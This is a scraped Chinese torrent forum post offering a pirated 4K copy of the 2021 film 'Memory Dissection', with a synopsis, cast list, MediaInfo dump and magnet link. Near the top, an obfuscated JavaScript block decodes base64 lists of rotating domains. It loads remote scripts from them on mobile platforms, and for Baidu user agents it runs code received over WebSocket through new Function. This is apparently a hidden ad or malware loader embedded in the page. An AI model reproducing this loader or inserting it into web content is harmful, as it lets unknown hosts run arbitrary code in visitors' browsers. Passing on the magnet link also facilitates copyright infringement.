记忆切割[国语音轨].Memory.Dissection.2021.WEB-DL.4K.迅雷下载 10.22GB

版主小s 27天前 203

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

image.png

◎译 名 记忆切割 / Memory Dissection

◎年 代 2021

◎产 地 中国大陆

◎类 别 科幻 / 悬疑

◎语 言 汉语普通话

◎上映日期 2021-04-23(中国大陆)

◎IMDb链接 https://www.imdb.com/title//

◎豆瓣评分 3.0/10 (1026人评价)

◎豆瓣链接 https://movie.douban.com/subject/33383459/

◎片 长 90分钟

◎导 演 果靖霖 Jinglin Guo (id:1274914)

◎编 剧 果靖霖 Jinglin Guo (id:1274914)

◎演 员 郭采洁 Amber Kuo (id:1274814)

果靖霖 Jinglin Guo (id:1274914)

刘雪华 Hsueh-hua Liu (id:1228553)

徐峥 Zheng Xu (id:1274297)

王芯宜 Xinyi Wang (id:1441354)

◎标 签 悬疑 / 郭采洁 / 中国大陆 / 徐峥 / 电影 / 怪不得 / 中国 / 2020

◎简 介

花季少女张辛儿(郭采洁饰),十岁那年意外看到了父母被枪杀的凶案现场,内心受到极大创伤。这永远无法抹去的痛苦记忆伴随她的成长。受张辛儿监护人辅导员刘梅(刘雪华饰)所托,著名生物科学家董教授(果靖霖饰)通过切割记忆的方法,帮她重塑记忆,切割痛苦。原本顺利的记忆切割实验,却接连不断的发生意外、失控,当真相不断浮出水面,张辛儿最终将如何面对这一切?

  1. General

  2. Unique ID : 140127809281110249332558794560487091307 (0x696BA2679E3E9CD593DC0413E590EC6B)

  3. Complete name : Memory.Dissection.2021.WEB-DL.4K.H265.DDP.5.1-Dave.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.2 GiB

  7. Duration : 1 h 29 min

  8. Overall bit rate : 16.3 Mb/s

  9. Encoded date : UTC 2021-06-28 08:25:37

  10. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@Main

  17. Codec ID : V_MPEGH/ISO/HEVC

  18. Duration : 1 h 29 min

  19. Bit rate : 15.9 Mb/s

  20. Width : 3 840 pixels

  21. Height : 1 608 pixels

  22. Display aspect ratio : 2.40:1

  23. Frame rate mode : Constant

  24. Frame rate : 24.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.107

  29. Stream size : 9.94 GiB (97%)

  30. Default : Yes

  31. Forced : No


  32. Audio #1

  33. ID : 2

  34. Format : E-AC-3

  35. Format/Info : Enhanced AC-3

  36. Commercial name : Dolby Digital Plus

  37. Codec ID : A_EAC3

  38. Duration : 1 h 29 min

  39. Bit rate mode : Constant

  40. Bit rate : 256 kb/s

  41. Channel(s) : 6 channels

  42. Channel layout : L R C LFE Ls Rs

  43. Sampling rate : 48.0 kHz

  44. Frame rate : 31.250 FPS (1536 SPF)

  45. Compression mode : Lossy

  46. Stream size : 164 MiB (2%)

  47. Language : Chinese

  48. Service kind : Complete Main

  49. Default : Yes

  50. Forced : No


  51. Audio #2

  52. ID : 3

  53. Format : AAC LC

  54. Format/Info : Advanced Audio Codec Low Complexity

  55. Codec ID : A_AAC-2

  56. Duration : 1 h 29 min

  57. Bit rate : 192 kb/s

  58. Channel(s) : 2 channels

  59. Channel layout : L R

  60. Sampling rate : 44.1 kHz

  61. Frame rate : 43.066 FPS (1024 SPF)

  62. Compression mode : Lossy

  63. Stream size : 122 MiB (1%)

  64. Language : Chinese

  65. Default : Yes

  66. Forced : No


TAGS 悬疑 科幻

磁力链:
  • magnet:?xt=urn:btih:181006D7221F91F8EA93875FC475C3E8C6BF3B5C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回